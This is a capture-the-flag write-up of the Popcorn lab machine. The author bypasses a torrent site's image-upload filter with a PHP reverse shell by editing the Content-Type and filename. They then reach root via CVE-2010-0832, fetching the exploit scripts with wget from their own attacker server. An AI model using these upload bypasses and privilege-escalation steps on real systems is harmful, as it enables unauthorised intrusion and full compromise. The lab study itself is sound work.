1. Executive Summary
Popcorn is Linux based machine with tampering vulnerability on upload feature in Torent Hoster. The vulnerability leads on attacker able to get shell and obtain the user flag. Local users able to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
2. Description
2.1 Enumeration
Enumerate the system using nmap tools.
I also checked the hidden directory inside http://10.10.10.6 using gobuster.
/index
Nothing useful on this page. So I have to skipped it.
/test
Inside the /test, I discovered that the website allows file upload.
/rename
This one is also not really informative, but let's move on to another page first.
/torrent
The website has login and sign up menu. I tried to check it by clicking sign up menu.
While analyzing inside the web page of torrent hoster, I decided to check if there is hidden directory inside the /torrent using command below.
gobuster dir -u http://10.10.10.6/torrent/ -o gbstrtorrent -w /root/Documents/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 — timeout 100s -k — no-error -x .html,.php,.ssh,.txt
After taking brief checking, I press the sign up menu and the website brought me to register page where I able to add username, email and password.
After I press register, it asked me to log in. Till this step, the website looks promising enough to get our attention to.
2.2 Exploitation
Successfully login as rarpunzel, I checked all the menus inside the webpage. There is an upload menu which caught my attention. It said that we need to upload our torrent file. I tried to add txt, jpg and png files, but the website return me failed.
In the middle uploading process, the website return me into this page where I found there is Kali Linux torent files in “other” category.
I tried to check on https://www.kali.org/get-kali/ and they really have kali linux torrent link. So I downloaded it and tried to upload the .iso.torrent into the website.
According to screenshots above, I managed to upload the torrent file. There is “Screenshots” field inside the torrent file that we uploaded earlier. So I copied my PHP reverse shell that I used for sneakymailer into my local directory and changed it from “shell.php” into “shell.png.php”. In case the website check if there is acceptable image file format inside the name of the file. However, it failed.
Looking at the response seems like they limit the file type into image only, since I tried to upload normally using png files and it works.
Again, I tried to upload my reverse shell files “shell.png.php” into the page. Using burp suite, I intercept the process and modified few things such as in below.
- I changed the content type from “Content-Type: application/x-php” into “Content-Type: image/png”.
- I changed the file name “filename=”shell.png.php”” into “filename=”shell.php””.
Surprisingly, It works!
Remember that I used gobuster earlier to check if there is hidden directory inside /torrent? According to the result there is /upload which actually contain the “screenshot” that we uploaded.
Before accessing the shell on the /torrent/upload, I start my listener in port 2222.
Logging in as www-data and got the user flag under George directory. Using command sudo -l, I tried to see what the permission our current user has. However, based on the screenshot below the current user did not have permission to run sudo.
I checked /george and discover there is .bashrc under it. I once encounter situation where we could take advantage using .bashrc, this website actually will tell you more about the exploitation of .bashrc.
First we need to check if there is strange permission in users inside the machine using command below.
ls -la /root/.bashrc;ls -la /home/*/.bashrc
Sadly, there are two user only and we could only see George.
I also make the shell more prettier using
python -c “import pty;pty.spawn(‘/bin/bash’)”
I skipped into another directory.
I tried to checked on the searchsploit, if there is an exploit about “motd”.
This legal notice tells you about the information we collect using MOTD — Message of the Day. According to their official website, “motd-news” is a package that makes a call periodically to Canonical servers to get updated news for support and informational purposes.
References to CVE 2010–0832, pam_motd (aka the MOTD module) in allows local users to change the ownership of arbitrary files via a symlink attack on .cache in a user’s home directory, related to “user file stamps” and the motd.legal-notice file.
I downloaded the bash script 14273.sh and 14339.sh into my local computer and start the python server with the command below.
python -m HTTPServer 8090
I used “wget http://10.10.16.8:8090/14273.sh” and “wget http://10.10.16.8:8090/14339.sh” in popcorn terminal under /tmp repository and run the scripts.
However, it said error on both files. I tried to copy the script and create a new file using vi but the connection was suddenly bad, I could not get myself out from vi. So, I used “export TERM=xterm” to be able to run nano command. However, the connection really not on my side, my terminal become freeze once I called nano. I also add “chmod +x 14339.sh” before running it again. Too bad it give me another error.
I tried to google for another solution to run the script and found someone has the same experience as me. According to this reddit post, we need to run this command before running the script to fix the problem: chmod -R 755 /var/www/.ssh
User OMGZwhitepeople explained that the exact location of where the script trips up and asks the user for a password is is on line 67. ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true
That line is trying to SSH with $KEY (which is a generated tmp directory, that houses the private key its trying to use for identity). The parameter ‘NoHostAuthenticationForLocalhost yes’ means “Dont ask me for a password if I am using SSH from myself”. This line fails due to the high permissions on the /var/www/.ssh directory.
So I decided to run command below
chmod -R 755 /var/www/.ssh
Re-run the script, and it works smoothly!
The script make me logged in as root, and since I am a root now I tried to find the location of the root flag. Finally, I got the root!
